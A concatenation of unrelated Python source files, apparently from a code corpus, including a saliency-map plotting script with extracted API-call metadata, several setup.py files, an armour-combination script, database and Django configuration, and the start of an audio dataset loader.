panel_file_names[k], dpi=FIGURE_RESOLUTION_DPI,
pad_inches=0, bbox_inches='tight'
)
pyplot.close(figure_objects[k])
imagemagick_utils.resize_image(
input_file_name=panel_file_names[k],
output_file_name=panel_file_names[k],
output_size_pixels=PANEL_SIZE_PX
)
concat_figure_file_name = '{0:s}/brightness_temp_concat.jpg'.format(
output_dir_name
)
plotting_utils.concat_panels(
panel_file_names=panel_file_names,
concat_figure_file_name=concat_figure_file_name
)
this_cmap_object, this_cnorm_object = (
satellite_plotting.get_colour_scheme()
)
plotting_utils.add_colour_bar(
figure_file_name=concat_figure_file_name,
colour_map_object=this_cmap_object,
colour_norm_object=this_cnorm_object,
orientation_string='vertical', font_size=COLOUR_BAR_FONT_SIZE,
cbar_label_string='Brightness temp (K)',
tick_label_format_string='{0:d}'
)
colour_norm_object = pyplot.Normalize(
vmin=min_abs_contour_value, vmax=max_abs_contour_value
)
label_string = 'Absolute {0:s}'.format(
'input times gradient' if plot_input_times_grad else 'saliency'
)
plotting_utils.add_colour_bar(
figure_file_name=concat_figure_file_name,
colour_map_object=colour_map_object,
colour_norm_object=colour_norm_object,
orientation_string='vertical', font_size=COLOUR_BAR_FONT_SIZE,
cbar_label_string=label_string, tick_label_format_string='{0:.2g}'
)
def _run(saliency_file_name, normalization_file_name, plot_input_times_grad,
spatial_colour_map_name, nonspatial_colour_map_name,
smoothing_radius_px, output_dir_name):
"""Plots composite saliency map.
This is effectively the main method.
:param saliency_file_name: See documentation at top of file.
:param normalization_file_name: Same.
:param plot_input_times_grad: Same.
:param spatial_colour_map_name: Same.
:param nonspatial_colour_map_name: Same.
:param smoothing_radius_px: Same.
:param output_dir_name: Same.
"""
spatial_colour_map_object = pyplot.get_cmap(spatial_colour_map_name)
nonspatial_colour_map_object = pyplot.get_cmap(nonspatial_colour_map_name)
file_system_utils.mkdir_recursive_if_necessary(
directory_name=output_dir_name
)
# Read files.
print('Reading data from: "{0:s}"...'.format(saliency_file_name))
saliency_dict = saliency.read_composite_file(saliency_file_name)
if plot_input_times_grad:
this_key = saliency.THREE_INPUT_GRAD_KEY
else:
this_key = saliency.THREE_SALIENCY_KEY
if smoothing_radius_px > 0 and saliency_dict[this_key][0] is not None:
print((
'Smoothing maps with Gaussian filter (e-folding radius of {0:.1f} '
'pixels)...'
).format(smoothing_radius_px))
num_lag_times = saliency_dict[this_key][0].shape[-2]
for k in range(num_lag_times):
saliency_dict[this_key][0][..., k, 0] = (
gg_general_utils.apply_gaussian_filter(
input_matrix=saliency_dict[this_key][0][..., k, 0],
e_folding_radius_grid_cells=smoothing_radius_px
)
)
model_file_name = saliency_dict[saliency.MODEL_FILE_KEY]
model_metafile_name = neural_net.find_metafile(
model_file_name=model_file_name, raise_error_if_missing=True
)
print('Reading metadata from: "{0:s}"...'.format(model_metafile_name))
model_metadata_dict = neural_net.read_metafile(model_metafile_name)
print('Reading data from: "{0:s}"...'.format(normalization_file_name))
normalization_table_xarray = normalization.read_file(
normalization_file_name
)
# Plot saliency map.
_plot_brightness_temp_saliency(
saliency_dict=saliency_dict, model_metadata_dict=model_metadata_dict,
normalization_table_xarray=normalization_table_xarray,
colour_map_object=spatial_colour_map_object,
plot_input_times_grad=plot_input_times_grad,
output_dir_name=output_dir_name
)
if __name__ == '__main__':
INPUT_ARG_OBJECT = INPUT_ARG_PARSER.parse_args()
_run(
saliency_file_name=getattr(INPUT_ARG_OBJECT, SALIENCY_FILE_ARG_NAME),
normalization_file_name=getattr(
INPUT_ARG_OBJECT, NORMALIZATION_FILE_ARG_NAME
),
plot_input_times_grad=bool(getattr(
INPUT_ARG_OBJECT, PLOT_INPUT_GRAD_ARG_NAME
)),
spatial_colour_map_name=getattr(
INPUT_ARG_OBJECT, SPATIAL_COLOUR_MAP_ARG_NAME
),
nonspatial_colour_map_name=getattr(
INPUT_ARG_OBJECT, NONSPATIAL_COLOUR_MAP_ARG_NAME
),
smoothing_radius_px=getattr(
INPUT_ARG_OBJECT, SMOOTHING_RADIUS_ARG_NAME
),
output_dir_name=getattr(INPUT_ARG_OBJECT, OUTPUT_DIR_ARG_NAME)
)
| [
"ml4tc.plotting.plotting_utils.concat_panels",
"numpy.array",
"numpy.ravel",
"gewittergefahr.gg_utils.general_utils.apply_gaussian_filter",
"numpy.repeat",
"argparse.ArgumentParser",
"matplotlib.pyplot.Normalize",
"matplotlib.pyplot.close",
"numpy.linspace",
"ml4tc.machine_learning.neural_net.find... | [((84, 105), 'matplotlib.use', 'matplotlib.use', (['"""agg"""'], {}), "('agg')\n", (98, 105), False, 'import matplotlib\n'), ((637, 672), 'numpy.array', 'numpy.array', (['[numpy.nan, 0, 1.5, 3]'], {}), '([numpy.nan, 0, 1.5, 3])\n', (648, 672), False, 'import numpy\n'), ((2217, 2242), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2240, 2242), False, 'import argparse\n'), ((4362, 4434), 'numpy.linspace', 'numpy.linspace', (['(-10)', '(10)'], {'num': 'predictor_matrices[0].shape[1]', 'dtype': 'float'}), '(-10, 10, num=predictor_matrices[0].shape[1], dtype=float)\n', (4376, 4434), False, 'import numpy\n'), ((4482, 4529), 'numpy.expand_dims', 'numpy.expand_dims', (['grid_latitudes_deg_n'], {'axis': '(1)'}), '(grid_latitudes_deg_n, axis=1)\n', (4499, 4529), False, 'import numpy\n'), ((4563, 4634), 'numpy.repeat', 'numpy.repeat', (['grid_latitude_matrix_deg_n'], {'axis': '(1)', 'repeats': 'num_lag_times'}), '(grid_latitude_matrix_deg_n, axis=1, repeats=num_lag_times)\n', (4575, 4634), False, 'import numpy\n'), ((4678, 4751), 'numpy.linspace', 'numpy.linspace', (['(300)', '(320)'], {'num': 'predictor_matrices[0].shape[2]', 'dtype': 'float'}), '(300, 320, num=predictor_matrices[0].shape[2], dtype=float)\n', (4692, 4751), False, 'import numpy\n'), ((4800, 4848), 'numpy.expand_dims', 'numpy.expand_dims', (['grid_longitudes_deg_e'], {'axis': '(1)'}), '(grid_longitudes_deg_e, axis=1)\n', (4817, 4848), False, 'import numpy\n'), ((4897, 4969), 'numpy.repeat', 'numpy.repeat', (['grid_longitude_matrix_deg_e'], {'axis': '(1)', 'repeats': 'num_lag_times'}), '(grid_longitude_matrix_deg_e, axis=1, repeats=num_lag_times)\n', (4909, 4969), False, 'import numpy\n'), ((7598, 7714), 'ml4tc.plotting.plotting_utils.concat_panels', 'plotting_utils.concat_panels', ([], {'panel_file_names': 'panel_file_names', 'concat_figure_file_name': 'concat_figure_file_name'}), '(panel_file_names=panel_file_names,\n concat_figure_file_name=concat_figure_file_name)\n', (7626, 7714), False, 'from ml4tc.plotting import plotting_utils\n'), ((7786, 7824), 'ml4tc.plotting.satellite_plotting.get_colour_scheme', 'satellite_plotting.get_colour_scheme', ([], {}), '()\n', (7822, 7824), False, 'from ml4tc.plotting import satellite_plotting\n'), ((7835, 8136), 'ml4tc.plotting.plotting_utils.add_colour_bar', 'plotting_utils.add_colour_bar', ([], {'figure_file_name': 'concat_figure_file_name', 'colour_map_object': 'this_cmap_object', 'colour_norm_object': 'this_cnorm_object', 'orientation_string': '"""vertical"""', 'font_size': 'COLOUR_BAR_FONT_SIZE', 'cbar_label_string': '"""Brightness temp (K)"""', 'tick_label_format_string': '"""{0:d}"""'}), "(figure_file_name=concat_figure_file_name,\n colour_map_object=this_cmap_object, colour_norm_object=\n this_cnorm_object, orientation_string='vertical', font_size=\n COLOUR_BAR_FONT_SIZE, cbar_label_string='Brightness temp (K)',\n tick_label_format_string='{0:d}')\n", (7864, 8136), False, 'from ml4tc.plotting import plotting_utils\n'), ((8199, 8271), 'matplotlib.pyplot.Normalize', 'pyplot.Normalize', ([], {'vmin': 'min_abs_contour_value', 'vmax': 'max_abs_contour_value'}), '(vmin=min_abs_contour_value, vmax=max_abs_contour_value)\n', (8215, 8271), False, 'from matplotlib import pyplot\n'), ((8412, 8708), 'ml4tc.plotting.plotting_utils.add_colour_bar', 'plotting_utils.add_colour_bar', ([], {'figure_file_name': 'concat_figure_file_name', 'colour_map_object': 'colour_map_object', 'colour_norm_object': 'colour_norm_object', 'orientation_string': '"""vertical"""', 'font_size': 'COLOUR_BAR_FONT_SIZE', 'cbar_label_string': 'label_string', 'tick_label_format_string': '"""{0:.2g}"""'}), "(figure_file_name=concat_figure_file_name,\n colour_map_object=colour_map_object, colour_norm_object=\n colour_norm_object, orientation_string='vertical', font_size=\n COLOUR_BAR_FONT_SIZE, cbar_label_string=label_string,\n tick_label_format_string='{0:.2g}')\n", (8441, 8708), False, 'from ml4tc.plotting import plotting_utils\n'), ((9353, 9393), 'matplotlib.pyplot.get_cmap', 'pyplot.get_cmap', (['spatial_colour_map_name'], {}), '(spatial_colour_map_name)\n', (9368, 9393), False, 'from matplotlib import pyplot\n'), ((9429, 9472), 'matplotlib.pyplot.get_cmap', 'pyplot.get_cmap', (['nonspatial_colour_map_name'], {}), '(nonspatial_colour_map_name)\n', (9444, 9472), False, 'from matplotlib import pyplot\n'), ((9477, 9555), 'gewittergefahr.gg_utils.file_system_utils.mkdir_recursive_if_necessary', 'file_system_utils.mkdir_recursive_if_necessary', ([], {'directory_name': 'output_dir_name'}), '(directory_name=output_dir_name)\n', (9523, 9555), False, 'from gewittergefahr.gg_utils import file_system_utils\n'), ((9679, 9727), 'ml4tc.machine_learning.saliency.read_composite_file', 'saliency.read_composite_file', (['saliency_file_name'], {}), '(saliency_file_name)\n', (9707, 9727), False, 'from ml4tc.machine_learning import saliency\n'), ((10573, 10663), 'ml4tc.machine_learning.neural_net.find_metafile', 'neural_net.find_metafile', ([], {'model_file_name': 'model_file_name', 'raise_error_if_missing': '(True)'}), '(model_file_name=model_file_name,\n raise_error_if_missing=True)\n', (10597, 10663), False, 'from ml4tc.machine_learning import neural_net\n'), ((10775, 10820), 'ml4tc.machine_learning.neural_net.read_metafile', 'neural_net.read_metafile', (['model_metafile_name'], {}), '(model_metafile_name)\n', (10799, 10820), False, 'from ml4tc.machine_learning import neural_net\n'), ((10930, 10978), 'ml4tc.utils.normalization.read_file', 'normalization.read_file', (['normalization_file_name'], {}), '(normalization_file_name)\n', (10953, 10978), False, 'from ml4tc.utils import normalization\n'), ((6001, 6036), 'numpy.absolute', 'numpy.absolute', (['all_saliency_values'], {}), '(all_saliency_values)\n', (6015, 6036), False, 'import numpy\n'), ((6127, 6162), 'numpy.absolute', 'numpy.absolute', (['all_saliency_values'], {}), '(all_saliency_values)\n', (6141, 6162), False, 'import numpy\n'), ((6354, 6751), 'ml4tc.plotting.satellite_plotting.plot_saliency', 'satellite_plotting.plot_saliency', ([], {'saliency_matrix': 'saliency_matrices[0][0, ..., k, 0]', 'axes_object': 'axes_objects[k]', 'latitude_array_deg_n': 'grid_latitude_matrix_deg_n[:, k]', 'longitude_array_deg_e': 'grid_longitude_matrix_deg_e[:, k]', 'min_abs_contour_value': 'min_abs_contour_value', 'max_abs_contour_value': 'max_abs_contour_value', 'half_num_contours': '(10)', 'colour_map_object': 'colour_map_object'}), '(saliency_matrix=saliency_matrices[0][0,\n ..., k, 0], axes_object=axes_objects[k], latitude_array_deg_n=\n grid_latitude_matrix_deg_n[:, k], longitude_array_deg_e=\n grid_longitude_matrix_deg_e[:, k], min_abs_contour_value=\n min_abs_contour_value, max_abs_contour_value=max_abs_contour_value,\n half_num_contours=10, colour_map_object=colour_map_object)\n', (6386, 6751), False, 'from ml4tc.plotting import satellite_plotting\n'), ((7263, 7294), 'matplotlib.pyplot.close', 'pyplot.close', (['figure_objects[k]'], {}), '(figure_objects[k])\n', (7275, 7294), False, 'from matplotlib import pyplot\n'), ((7304, 7447), 'gewittergefahr.plotting.imagemagick_utils.resize_image', 'imagemagick_utils.resize_image', ([], {'input_file_name': 'panel_file_names[k]', 'output_file_name': 'panel_file_names[k]', 'output_size_pixels': 'PANEL_SIZE_PX'}), '(input_file_name=panel_file_names[k],\n output_file_name=panel_file_names[k], output_size_pixels=PANEL_SIZE_PX)\n', (7334, 7447), False, 'from gewittergefahr.plotting import imagemagick_utils\n'), ((3915, 3943), 'numpy.expand_dims', 'numpy.expand_dims', (['p'], {'axis': '(0)'}), '(p, axis=0)\n', (3932, 3943), False, 'import numpy\n'), ((4207, 4235), 'numpy.expand_dims', 'numpy.expand_dims', (['p'], {'axis': '(0)'}), '(p, axis=0)\n', (4224, 4235), False, 'import numpy\n'), ((5529, 5548), 'numpy.array', 'numpy.array', (['[20.0]'], {}), '([20.0])\n', (5540, 5548), False, 'import numpy\n'), ((5585, 5605), 'numpy.array', 'numpy.array', (['[330.0]'], {}), '([330.0])\n', (5596, 5605), False, 'import numpy\n'), ((5881, 5895), 'numpy.ravel', 'numpy.ravel', (['s'], {}), '(s)\n', (5892, 5895), False, 'import numpy\n'), ((10273, 10417), 'gewittergefahr.gg_utils.general_utils.apply_gaussian_filter', 'gg_general_utils.apply_gaussian_filter', ([], {'input_matrix': 'saliency_dict[this_key][0][..., k, 0]', 'e_folding_radius_grid_cells': 'smoothing_radius_px'}), '(input_matrix=saliency_dict[this_key]\n [0][..., k, 0], e_folding_radius_grid_cells=smoothing_radius_px)\n', (10311, 10417), True, 'from gewittergefahr.gg_utils import general_utils as gg_general_utils\n')] |
""" Setup file """
import os
from setuptools import setup, find_packages
HERE = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(HERE, "README.rst")).read()
CHANGES = open(os.path.join(HERE, "CHANGES.rst")).read()
REQUIREMENTS = [
"dynamo3>=0.4.7",
"future>=0.15.0",
"pyparsing==2.1.4",
"python-dateutil<2.7.0",
]
EXTRAS = {
"test": ["nose", "mock"],
"lint": ["black", "pylint==2.3.1"],
"doc": ["numpydoc", "sphinx", "sphinx_rtd_theme"],
}
if __name__ == "__main__":
setup(
name="dql",
version="0.5.26",
description="DynamoDB Query Language",
long_description=README + "\n\n" + CHANGES,
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
author="<NAME>",
author_email="<EMAIL>",
url="http://github.com/stevearc/dql",
keywords="aws dynamo dynamodb sql",
license="MIT",
platforms="any",
include_package_data=True,
packages=find_packages(exclude=("tests",)),
entry_points={"console_scripts": ["dql = dql:main"]},
install_requires=REQUIREMENTS,
tests_require=REQUIREMENTS + EXTRAS["test"],
extras_require=EXTRAS,
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
] | [((99, 124), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (114, 124), False, 'import os\n'), ((140, 172), 'os.path.join', 'os.path.join', (['HERE', '"""README.rst"""'], {}), "(HERE, 'README.rst')\n", (152, 172), False, 'import os\n'), ((196, 229), 'os.path.join', 'os.path.join', (['HERE', '"""CHANGES.rst"""'], {}), "(HERE, 'CHANGES.rst')\n", (208, 229), False, 'import os\n'), ((1515, 1548), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests',)"}), "(exclude=('tests',))\n", (1528, 1548), False, 'from setuptools import setup, find_packages\n')] |
import multiprocessing
import csv_exporter
from combination.brute_force_combination_algorithm import \
BruteForceCombinationAlgorithm
from combination.combiner import Combiner
from combination.constrained_combination_algorithm import \
ConstrainedCombinationAlgorithm
from config.config_importer import ConfigImporter
from equipment.equipment_piece import BodyPart
from mhw_db_loaders.armour_loader import ArmourLoader
from mhw_db_loaders.armour_set_loader import ArmourSetLoader
from mhw_db_loaders.armour_set_skill_loader import ArmourSetSkillLoader
from mhw_db_loaders.charm_loader import CharmLoader
from mhw_db_loaders.data_loader import load_json
from mhw_db_loaders.skill_loader import SkillLoader
from scorer import Scorer
def count_armour_pieces(body_part, armour_pieces) -> int:
return len(
[
piece
for piece in armour_pieces
if piece.body_part == body_part
]
)
def run(
config_location: str,
skills_location: str,
armour_sets_location: str,
armour_location: str,
charms_location: str,
export_location: str
):
loaded_skills = SkillLoader(load_json(skills_location)).load()
skills = loaded_skills.by_id()
skills_by_name = loaded_skills.by_name()
skill_ranks = loaded_skills.skill_ranks_by_id()
config = ConfigImporter(config_location, skills_by_name).load()
print("Successfully loaded config.")
armour_sets = ArmourSetLoader(load_json(armour_sets_location)).load()
armour_set_skills = ArmourSetSkillLoader(
armour_sets,
skills,
skill_ranks
).load()
armour_pieces = ArmourLoader(
config,
armour_sets,
skill_ranks,
load_json(armour_location)
).load()
charms = CharmLoader(config, skill_ranks, load_json(charms_location)).load()
print(
"Loaded {} equipment pieces {{\n"
" head: {}\n"
" chest: {}\n"
" gloves: {}\n"
" waist: {}\n"
" legs: {}\n"
" charms: {}\n"
"}}".format(
len(armour_pieces),
count_armour_pieces(BodyPart.HEAD, armour_pieces),
count_armour_pieces(BodyPart.CHEST, armour_pieces),
count_armour_pieces(BodyPart.GLOVES, armour_pieces),
count_armour_pieces(BodyPart.WAIST, armour_pieces),
count_armour_pieces(BodyPart.LEGS, armour_pieces),
len(charms)
)
)
equipment = armour_pieces + charms
equipment_by_body_part = {body_part: [] for body_part in BodyPart}
for piece in equipment:
equipment_by_body_part[piece.body_part].append(piece)
# Reserve one CPU for the progress bar, if possible.
num_worker_cpus = max(multiprocessing.cpu_count() - 1, 1)
combinations = Combiner(
equipment_by_body_part,
[
BruteForceCombinationAlgorithm(
num_worker_cpus,
config.result_limit
),
ConstrainedCombinationAlgorithm(
config.skill_config,
skills_by_name,
armour_set_skills,
config.result_limit
)
],
Scorer(config, skills_by_name, skill_ranks),
num_worker_cpus
).generate_combinations(config)
csv_exporter.export_combinations(combinations, skill_ranks, export_location)
| [
"mhw_db_loaders.data_loader.load_json",
"combination.constrained_combination_algorithm.ConstrainedCombinationAlgorithm",
"config.config_importer.ConfigImporter",
"multiprocessing.cpu_count",
"csv_exporter.export_combinations",
"scorer.Scorer",
"combination.brute_force_combination_algorithm.BruteForceCom... | [((3291, 3367), 'csv_exporter.export_combinations', 'csv_exporter.export_combinations', (['combinations', 'skill_ranks', 'export_location'], {}), '(combinations, skill_ranks, export_location)\n', (3323, 3367), False, 'import csv_exporter\n'), ((1329, 1376), 'config.config_importer.ConfigImporter', 'ConfigImporter', (['config_location', 'skills_by_name'], {}), '(config_location, skills_by_name)\n', (1343, 1376), False, 'from config.config_importer import ConfigImporter\n'), ((1523, 1577), 'mhw_db_loaders.armour_set_skill_loader.ArmourSetSkillLoader', 'ArmourSetSkillLoader', (['armour_sets', 'skills', 'skill_ranks'], {}), '(armour_sets, skills, skill_ranks)\n', (1543, 1577), False, 'from mhw_db_loaders.armour_set_skill_loader import ArmourSetSkillLoader\n'), ((2728, 2755), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (2753, 2755), False, 'import multiprocessing\n'), ((1149, 1175), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['skills_location'], {}), '(skills_location)\n', (1158, 1175), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1459, 1490), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['armour_sets_location'], {}), '(armour_sets_location)\n', (1468, 1490), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1715, 1741), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['armour_location'], {}), '(armour_location)\n', (1724, 1741), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1801, 1827), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['charms_location'], {}), '(charms_location)\n', (1810, 1827), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((3181, 3224), 'scorer.Scorer', 'Scorer', (['config', 'skills_by_name', 'skill_ranks'], {}), '(config, skills_by_name, skill_ranks)\n', (3187, 3224), False, 'from scorer import Scorer\n'), ((2847, 2915), 'combination.brute_force_combination_algorithm.BruteForceCombinationAlgorithm', 'BruteForceCombinationAlgorithm', (['num_worker_cpus', 'config.result_limit'], {}), '(num_worker_cpus, config.result_limit)\n', (2877, 2915), False, 'from combination.brute_force_combination_algorithm import BruteForceCombinationAlgorithm\n'), ((2975, 3087), 'combination.constrained_combination_algorithm.ConstrainedCombinationAlgorithm', 'ConstrainedCombinationAlgorithm', (['config.skill_config', 'skills_by_name', 'armour_set_skills', 'config.result_limit'], {}), '(config.skill_config, skills_by_name,\n armour_set_skills, config.result_limit)\n', (3006, 3087), False, 'from combination.constrained_combination_algorithm import ConstrainedCombinationAlgorithm\n')] |
from setuptools import setup
import src
setup(name='lsankidb',
version=src.__version__,
install_requires=['AnkiTools'],
description='"ls" for your local Anki database.',
#FIXME this duplicates README.md
long_description="""
.. image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png
:height: 64px
:width: 64px
:align: right
lsankidb
========
``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.
Dump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.
::
$ lsankidb
Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...
Default
French
['Hello', 'Bonjour']
['How are you?', 'Comment ça va ?']
German
['Hello', 'Hallo']
['How are you?', "Wie geht's?"]
`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__
""",
keywords=['anki',
'terminal',
'cli',
'dump',
'ls',],
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/AurelienLourot/lsankidb',
download_url='https://github.com/AurelienLourot/lsankidb/tarball/'
+ src.__version__,
license='public domain',
classifiers=['Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Public Domain',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Education',
'Topic :: Utilities'],
packages=['src'],
entry_points="""
[console_scripts]
lsankidb = src.lsankidb:main
""")
| [
"setuptools.setup"
] | [((41, 1624), 'setuptools.setup', 'setup', ([], {'name': '"""lsankidb"""', 'version': 'src.__version__', 'install_requires': "['AnkiTools']", 'description': '""""ls" for your local Anki database."""', 'long_description': '"""\n.. image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png\n :height: 64px\n :width: 64px\n :align: right\n\nlsankidb\n========\n\n``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.\n\nDump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.\n\n::\n\n $ lsankidb\n Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...\n \n Default\n French\n [\'Hello\', \'Bonjour\']\n [\'How are you?\', \'Comment ça va ?\']\n German\n [\'Hello\', \'Hallo\']\n [\'How are you?\', "Wie geht\'s?"]\n\n`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__\n"""', 'keywords': "['anki', 'terminal', 'cli', 'dump', 'ls']", 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/AurelienLourot/lsankidb"""', 'download_url': "('https://github.com/AurelienLourot/lsankidb/tarball/' + src.__version__)", 'license': '"""public domain"""', 'classifiers': "['Development Status :: 4 - Beta', 'Environment :: Console',\n 'Intended Audience :: Developers', 'License :: Public Domain',\n 'Natural Language :: English', 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6', 'Topic :: Education',\n 'Topic :: Utilities']", 'packages': "['src']", 'entry_points': '"""\n[console_scripts]\nlsankidb = src.lsankidb:main\n"""'}), '(name=\'lsankidb\', version=src.__version__, install_requires=[\n \'AnkiTools\'], description=\'"ls" for your local Anki database.\',\n long_description=\n """\n.. image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png\n :height: 64px\n :width: 64px\n :align: right\n\nlsankidb\n========\n\n``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.\n\nDump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.\n\n::\n\n $ lsankidb\n Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...\n \n Default\n French\n [\'Hello\', \'Bonjour\']\n [\'How are you?\', \'Comment ça va ?\']\n German\n [\'Hello\', \'Hallo\']\n [\'How are you?\', "Wie geht\'s?"]\n\n`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__\n"""\n , keywords=[\'anki\', \'terminal\', \'cli\', \'dump\', \'ls\'], author=\'<NAME>\',\n author_email=\'<EMAIL>\', url=\n \'https://github.com/AurelienLourot/lsankidb\', download_url=\n \'https://github.com/AurelienLourot/lsankidb/tarball/\' + src.__version__,\n license=\'public domain\', classifiers=[\'Development Status :: 4 - Beta\',\n \'Environment :: Console\', \'Intended Audience :: Developers\',\n \'License :: Public Domain\', \'Natural Language :: English\',\n \'Operating System :: POSIX :: Linux\',\n \'Programming Language :: Python :: 3.5\',\n \'Programming Language :: Python :: 3.6\', \'Topic :: Education\',\n \'Topic :: Utilities\'], packages=[\'src\'], entry_points=\n """\n[console_scripts]\nlsankidb = src.lsankidb:main\n""")\n', (46, 1624), False, 'from setuptools import setup\n')] |
import logging
from injector import inject, singleton
from starlette.config import Config
from common.database import BaseDatabase
LOGGER = logging.getLogger(__name__)
@singleton
@inject
class MasterDatabase(BaseDatabase):
def __init__(self, config: Config) -> None:
super().__init__(config)
self.__database_url: str = config('MASTER_DATABASE_URL', str)
LOGGER.debug('Master Session Maker Initialized')
self.test_connection()
@property
def get_db_url(self) -> str:
return self.__database_url
@singleton
@inject
class ReplicaDatabase(BaseDatabase):
def __init__(self, config: Config) -> None:
super().__init__(config)
self.__database_url: str = config('REPLICA_DATABASE_URL', str)
LOGGER.debug('Replica Session Maker Initialized')
self.test_connection()
@property
def get_db_url(self) -> str:
return self.__database_url
| [
"logging.getLogger"
] | [((143, 170), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (160, 170), False, 'import logging\n')] |
# python3
"""Testing code to run the typed_ast based pyi parser."""
import sys
from pytype import module_utils
from pytype.pyi import parser
from pytype.pyi.types import ParseError # pylint: disable=g-importing-member
from pytype.pytd import pytd_utils
if __name__ == '__main__':
filename = sys.argv[1]
with open(filename, 'r') as f:
src = f.read()
module_name = module_utils.path_to_module_name(filename)
version = (3, 6)
try:
out, _ = parser.parse_pyi_debug(
src, filename, module_name, version, None)
except ParseError as e:
print(e)
sys.exit(1)
print('------pytd--------------')
print(out)
print('------round trip--------------')
print(pytd_utils.Print(out))
| [
"pytype.pytd.pytd_utils.Print",
"sys.exit",
"pytype.pyi.parser.parse_pyi_debug",
"pytype.module_utils.path_to_module_name"
] | [((380, 422), 'pytype.module_utils.path_to_module_name', 'module_utils.path_to_module_name', (['filename'], {}), '(filename)\n', (412, 422), False, 'from pytype import module_utils\n'), ((463, 528), 'pytype.pyi.parser.parse_pyi_debug', 'parser.parse_pyi_debug', (['src', 'filename', 'module_name', 'version', 'None'], {}), '(src, filename, module_name, version, None)\n', (485, 528), False, 'from pytype.pyi import parser\n'), ((694, 715), 'pytype.pytd.pytd_utils.Print', 'pytd_utils.Print', (['out'], {}), '(out)\n', (710, 715), False, 'from pytype.pytd import pytd_utils\n'), ((581, 592), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (589, 592), False, 'import sys\n')] |
from django.contrib import admin
from .models import *
admin.site.register(University)
admin.site.register(Faculty)
admin.site.register(Subject)
admin.site.register(Teacher)
| [
"django.contrib.admin.site.register"
] | [((57, 88), 'django.contrib.admin.site.register', 'admin.site.register', (['University'], {}), '(University)\n', (76, 88), False, 'from django.contrib import admin\n'), ((89, 117), 'django.contrib.admin.site.register', 'admin.site.register', (['Faculty'], {}), '(Faculty)\n', (108, 117), False, 'from django.contrib import admin\n'), ((118, 146), 'django.contrib.admin.site.register', 'admin.site.register', (['Subject'], {}), '(Subject)\n', (137, 146), False, 'from django.contrib import admin\n'), ((147, 175), 'django.contrib.admin.site.register', 'admin.site.register', (['Teacher'], {}), '(Teacher)\n', (166, 175), False, 'from django.contrib import admin\n')] |
import multiprocessing
import os
bind = "{0}:{1}".format(os.environ.get('HOST', '0.0.0.0'), os.environ.get('PORT', '8080'))
workers = os.environ.get('WORKERS', multiprocessing.cpu_count() * 2 + 1)
| [
"os.environ.get",
"multiprocessing.cpu_count"
] | [((59, 92), 'os.environ.get', 'os.environ.get', (['"""HOST"""', '"""0.0.0.0"""'], {}), "('HOST', '0.0.0.0')\n", (73, 92), False, 'import os\n'), ((94, 124), 'os.environ.get', 'os.environ.get', (['"""PORT"""', '"""8080"""'], {}), "('PORT', '8080')\n", (108, 124), False, 'import os\n'), ((162, 189), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (187, 189), False, 'import multiprocessing\n')] |
import numpy as np
def import_accuracy(y_test, predictions):
errors = abs(predictions - y_test)
mape = 100 * (errors / y_test)
accuracy = 100 - np.mean(mape)
return accuracy
| [
"numpy.mean"
] | [((148, 161), 'numpy.mean', 'np.mean', (['mape'], {}), '(mape)\n', (155, 161), True, 'import numpy as np\n')] |
import numpy as np
import os
import torch
import torch.utils.data as data
import pdb
import pickle
from pathlib import Path
from scipy import signal
import librosa
import scipy
from itertools import permutations
from numpy.linalg import solve
import numpy as np
import soundfile as sf
from convolutive_prediction import Apply_ConvolutivePrediction
class AudioDataset(data.Dataset):
def __init__(self,trainMode, functionMode, num_spks, num_ch, pickle_dir, ref_ch, model,device,cudaUse,check_audio,dereverb_Info,**STFT_args):
super(AudioDataset, self).__init__()
self.trainMode = trainMode
self.functionMode = functionMode
self.model = model
self.fs = STFT_args['fs']
